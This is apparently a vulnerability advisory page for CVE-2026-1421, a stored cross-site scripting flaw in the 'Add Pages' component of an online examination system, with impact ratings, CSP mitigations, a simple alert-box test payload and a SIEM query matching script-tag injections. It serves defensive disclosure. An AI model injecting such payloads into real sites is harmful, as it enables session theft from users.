Login Sign Up

CVE-2026-1421

3.5 LOW
Cross-Site Scripting

📋 TL;DR

This vulnerability allows attackers to inject malicious scripts into the Online Examination System 1.0 through the 'Add Pages' component. When users view affected pages, the scripts execute in their browsers, potentially stealing session cookies or redirecting to malicious sites. Anyone using code-projects Online Examination System 1.0 is affected.

💻 Affected Systems

Products:
  • code-projects Online Examination System
Versions: 1.0
Operating Systems: Any
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the 'Add Pages' component where user input is not properly sanitized before being stored and displayed.

📦 What is this software?

Online Examination System by Fabian

View all CVEs affecting Online Examination System →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal administrator credentials, take over the examination system, manipulate exam results, or install backdoors for persistent access.

🟠

Likely Case

Attackers steal user session cookies to impersonate legitimate users, potentially accessing sensitive exam data or student information.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized before reaching users' browsers.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit details are publicly available on GitHub, making it easy for attackers to craft XSS payloads.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Implement input validation and output encoding in the 'Add Pages' component code.

🔧 Temporary Workarounds

Implement Input Validation

all

Add server-side validation to sanitize all user inputs in the 'Add Pages' component.

Enable Content Security Policy

all

Implement CSP headers to restrict script execution sources.

Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Header set X-Content-Type-Options "nosniff"

🧯 If You Can't Patch

  • Disable the 'Add Pages' functionality if not essential
  • Implement a web application firewall (WAF) with XSS protection rules

🔍 How to Verify

Check if Vulnerable:

Test the 'Add Pages' feature by submitting a script payload like <script>alert('XSS')</script> and check if it executes when viewing the page.

Check Version:

Check the system's documentation or configuration files for version information.

Verify Fix Applied:

After implementing fixes, test with the same XSS payload to ensure it's properly sanitized and doesn't execute.

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to add pages with script tags or JavaScript code in parameters
  • Multiple failed attempts with suspicious payloads

Network Indicators:

  • HTTP requests containing <script> tags or JavaScript in POST data to add pages endpoints

SIEM Query:

source="web_logs" AND (http_method="POST" AND uri_path="*add*page*" AND (http_content="*<script>*" OR http_content="*javascript:*"))

📊 Metadata

CVE ID: CVE-2026-1421
CVSS v3 Score: 3.5 (LOW)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CWE: CWE-79
EPSS Score: 0.01% exploit probability (0.7th percentile)
Published: January 26, 2026
Last Updated: January 28, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-1421, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)